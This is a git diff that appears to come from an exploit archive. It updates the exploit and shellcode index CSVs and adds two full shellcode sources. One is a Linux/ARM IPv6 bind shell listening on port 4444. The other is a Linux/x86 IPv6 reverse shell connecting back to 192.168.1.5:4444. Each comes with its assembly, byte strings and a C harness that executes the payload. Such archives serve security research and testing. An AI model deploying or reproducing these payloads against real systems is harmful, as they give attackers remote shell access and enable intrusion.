 39132,exploits/windows/local/39132.py,"FTPShell Client 5.24 - Local Buffer Overflow",2015-12-30,hyp3rlinx,local,windows,
 39134,exploits/linux/local/39134.txt,"DeleGate 9.9.13 - Local Privilege Escalation",2015-12-30,"Larry W. Cashdollar",local,linux,
 39147,exploits/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",local,osx,
-39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,local,windows,
+39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow",2016-01-04,INSECT.B,local,windows,
 39166,exploits/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)",2016-01-05,rebel,local,linux,
 39207,exploits/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals",2014-05-25,"Raphael Geissert",local,linux,
 39214,exploits/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",local,linux,
@@ -9241,7 +9241,7 @@ id,file,description,date,author,type,platform,port
 40360,exploits/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",local,linux,3306
 40774,exploits/linux/local/40774.sh,"Nagios 4.2.2 - Local Privilege Escalation",2016-11-18,"Vincent Malguy",local,linux,
 39340,exploits/android/local/39340.cpp,"Google Android - 'sensord' Local Privilege Escalation",2016-01-27,s0m3b0dy,local,android,
-39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow",2016-02-04,"Arash Khazaei",local,windows,
+39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow",2016-02-04,"Arash Khazaei",local,windows,
 39432,exploits/windows_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,local,windows_x86,
 39433,exploits/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2016-02-10,"King's Way",local,linux,
 39438,exploits/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,local,xml,
@@ -9850,6 +9850,8 @@ id,file,description,date,author,type,platform,port
 45137,exploits/windows/local/45137.py,"AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)",2018-08-02,"Luis Martínez",local,windows,
 45130,exploits/linux/local/45130.py,"Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation",2018-08-02,0x09AL,local,linux,
 45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux,
+45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows,
+45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39726,7 +39728,7 @@ id,file,description,date,author,type,platform,port
 45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
-45125,exploits/php/webapps/45125.txt,"Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
+45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
@@ -39741,3 +39743,9 @@ id,file,description,date,author,type,platform,port
 45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
 45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
 45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
+45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
+45141,exploits/php/webapps/45141.txt,"Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
+45143,exploits/php/webapps/45143.txt,"PHP Template Store Script 3.0.6 - Cross-Site Scripting",2018-08-03,"Sarafraz Khan",webapps,php,80
+45145,exploits/xml/webapps/45145.txt,"Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
+45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
+45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b6d8da0c6..30c9c51b0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -898,3 +898,5 @@ id,file,description,date,author,type,platform
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
 45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86
 45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
+45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
+45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
diff --git a/shellcodes/arm/45144.c b/shellcodes/arm/45144.c
new file mode 100644
index 000000000..6b634bb4b
--- /dev/null
+++ b/shellcodes/arm/45144.c
@@ -0,0 +1,137 @@
+/*
+Title:  Linux/ARM - IPv6 4444/TCP Bind Shellcode (128 Bytes)
+Date:   2018-07-25
+Tested: armv7l (Raspberry Pi 3 Model B+)
+Author: Ken Kitahara
+
+pi@raspberrypi:~ $ uname -a
+Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
+pi@raspberrypi:~ $ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Raspbian
+Description:	Raspbian GNU/Linux 9.4 (stretch)
+Release:	9.4
+Codename:	stretch
+pi@raspberrypi:~ $ cat bindshell-ipv6.s 
+.section .text
+.global _start
+
+_start:
+    .ARM
+    add  r3, pc, #1
+    bx   r3
+
+    .THUMB
+    // socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
+    mov  r0, #10
+    mov  r1, #1
+    eor  r2, r2, r2
+    mov  r7, #100
+    add  r7, r7, #181
+    svc  #1
+    // save fd
+    mov  r4, r0
+
+    // bind(fd, &sockaddr, 28)
+    adr  r1, struct_addr
+    // replace 0xff with NULL and set sin6_family to 0x0a (AF_INET6)
+    strb r2, [r1, #1]
+    // replace 1 with NULL and set sin6_flowinfo to NULL
+    str  r2, [r1, #4]
+    // replace 1 with NULL and set sin6_addr to ::
+    str  r2, [r1, #8]
+    str  r2, [r1, #12]
+    str  r2, [r1, #16]
+    str  r2, [r1, #20]
+    // replace 1 with NULL and set sin6_scope_id to NULL
+    str  r2, [r1, #24]
+    mov  r2, #28
+    add  r7, r7, #1
+    svc  #1
+
+    // listen(host_sockid, 2)
+    mov  r0, r4
+    mov  r1, #2
+    add  r7, r7, #2
+    svc  #1
+
+    // accept(host_sockid, 0, 0)
+    mov  r0, r4
+    eor  r1, r1, r1
+    eor  r2, r2, r2
+    add  r7, r7, #1
+    svc  #1
+    // save fd
+    mov  r4, r0
+
+    // dup2(client_sockid, 0)
+    mov  r7, #63
+    svc  #1
+
+    // dup2(client_sockid, 1)
+    mov  r0, r4
+    add  r1, r1, #1
+    svc  #1
+
+    // dup2(client_sockid, 2)
+    mov  r0, r4
+    add  r1, r1, #1
+    svc  #1
+
+    // execve("/bin/sh", 0, 0)
+    eor  r1, r1, r1
+    eor  r2, r2, r2
+    adr  r0, spawn
+    strb r2, [r0, #7]
+    mov  r7, #11
+    svc  #1
+
+spawn:
+.ascii "/bin/shA"
+
+struct_addr:
+.ascii "\x0a\xff" // sin6_family -> AF_INET6
+.ascii "\x11\x5c" // sin6_port -> 4444
+.byte  1,1,1,1    // sin6_flowinfo -> NULL
+.byte  1,1,1,1    // sin6_addr -> ::
+.byte  1,1,1,1
+.byte  1,1,1,1
+.byte  1,1,1,1
+.byte  1,1,1,1    // sin6_scope_id -> NULL
+
+pi@raspberrypi:~ $ as -o bindshell-ipv6.o bindshell-ipv6.s && ld -N -o bindshell-ipv6 bindshell-ipv6.o
+pi@raspberrypi:~ $ objcopy -O binary bindshell-ipv6 bindshell-ipv6.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell-ipv6.bin
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x0a\x20\x01\x21\x52\x40\x64\x27\xb5\x37\x01\xdf\x04\x1c\x13\xa1\x4a\x70\x4a\x60\x8a\x60\xca\x60\x0a\x61\x4a\x61\x8a\x61\x1c\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x40\x52\x40\x01\x37\x01\xdf\x04\x1c\x3f\x27\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x49\x40\x52\x40\x01\xa0\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x41\x0a\xff\x11\x5c\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char sc[] = \
+"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
+"\x0a\x20\x01\x21\x52\x40\x64\x27"
+"\xb5\x37\x01\xdf\x04\x1c\x13\xa1"
+"\x4a\x70\x4a\x60\x8a\x60\xca\x60"
+"\x0a\x61\x4a\x61\x8a\x61\x1c\x22"
+"\x01\x37\x01\xdf\x20\x1c\x02\x21"
+"\x02\x37\x01\xdf\x20\x1c\x49\x40"
+"\x52\x40\x01\x37\x01\xdf\x04\x1c"
+"\x3f\x27\x01\xdf\x20\x1c\x01\x31"
+"\x01\xdf\x20\x1c\x01\x31\x01\xdf"
+"\x49\x40\x52\x40\x01\xa0\xc2\x71"
+"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
+"\x2f\x73\x68\x41\x0a\xff\x11\x5c"
+"\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x01\x01\x01\x01";
+
+void main()
+{
+    printf("Shellcode Length: %d\n", strlen(sc));
+
+    int (*ret)() = (int(*)())sc;
+
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45139.c b/shellcodes/linux_x86/45139.c
new file mode 100644
index 000000000..87e41d262
--- /dev/null
+++ b/shellcodes/linux_x86/45139.c
@@ -0,0 +1,107 @@
+# Title: Linux/x86 - Reverse TCP shell (IPv6) + Null Free
+# Shellcode Author: Kartik Durg
+# Shellcode Length: 86 BYTES
+# Student-ID: SLAE-1233
+# Note ~
+https://iamroot.blog/2018/07/29/0x2-shell_reverse_tcp_ipv6-linux-x86/
+# Description: Connect-back to IPV6 socket listening on IP
+::FFFF:192.168.1.5 and port 4444.
+
+/*
+
+global _start
+section .text
+
+;References:
+;(1)http://syscalls.kernelgrok.com/
+;(2)https://www.3dbrew.org/wiki/Socket_Services
+;(3)
+https://www.ibm.com/support/knowledgecenter/en/ssw_ibm_i_71/rzab6/cafinet6.htm
+
+_start:
+;IPV6 socket creation
+;int socketcall(int call, unsigned long *args);
+;sockfd = socket(int socket_family, int socket_type, int protocol);
+push byte 0x66        ;socketcall()
+pop eax                    ;EAX=0x2
+
+xor ebx,ebx              ;zero out ebx
+
+push 0x6                  ; IPPROTO_TCP=6
+push 0x1                  ; socket_type=SOCK_STREAM (0x1)
+push 0xa                  ; AF_INET6
+inc ebx                     ; Define SYS_socket = 1
+mov ecx,esp            ; save pointer (ESP) to socket() args (ECX)
+int 0x80
+xchg esi,eax            ; sockfd stored in esi
+xor eax,eax
+
+;Connect
+;connect(sockfd, (struct sockaddr*)&srvaddr, sizeof(srvaddr));
+;int socketcall(int call, unsigned long *args);
+push DWORD eax                 ;sin6_scope_id
+push DWORD 0x0501a8c0   ;MY LOCAL IP = 192.168.1.5 | Can be configured to
+YOUR's
+push word 0xffff
+push DWORD eax
+push DWORD eax
+push WORD ax        ;inet_pton(AF_INET6, "::ffff:192.168.1.5",
+&srvaddr.sin6_addr)
+push DWORD eax                  ;sin6_flowinfo
+push WORD 0x5c11               ;sin6_port=4444 | 0x5c11 | Configurable |
+push WORD 0x0a                   ;AF_INET6
+mov ecx,esp                            ;ECX holds pointer to struct
+sockaddr_in6
+push byte 0x1c                        ;sizeof(sockaddr_in6) | sockaddr_in6
+= 28
+push ecx                                  ;pointer to sockfd
+push esi                                   ;sockfd
+mov ecx,esp                            ;ECX points to args
+inc ebx
+inc ebx                                      ;EBX = 0x3 | #define
+SYS_Connect 3
+push byte 0x66                         ;socketcall()
+pop eax
+int 80h
+
+push byte 0x2                           ;push 0x2 on stack
+pop ecx                                     ;ECX = 2
+
+;dup2() to redirect stdin(0), stdout(1) and stderr(2)
+loop:
+push byte 0x3f        ;dup2()
+pop eax                   ;EAX = 0x3f
+int 0x80                   ;exec sys_dup2
+dec ecx                    ;decrement counter
+jns loop                    ;if SF not set ==> keep on jumping
+
+;execve(/bin//sh)
+xor ecx,ecx               ;clear ECX
+push ecx                   ;Push NULL
+push byte 0x0b         ;execve() sys call number
+pop eax                     ;EAX=0x2 | execve()
+push 0x68732f2f       ;(1)/bin//sh
+push 0x6e69622f      ;(2)/bin//sh
+mov ebx,esp             ;EBX pointing to “/bin//sh”
+int 0x80                     ;Calling Interrupt for sys call
+
+*/
+
+/*
+gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32
+
+./shellcode
+
+*/
+
+#include<stdio.h>
+
+unsigned char shellcode[] = \
+"\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x68\xc0\xa8\x01\x05\x66\x6a\xff\x50\x50\x66\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file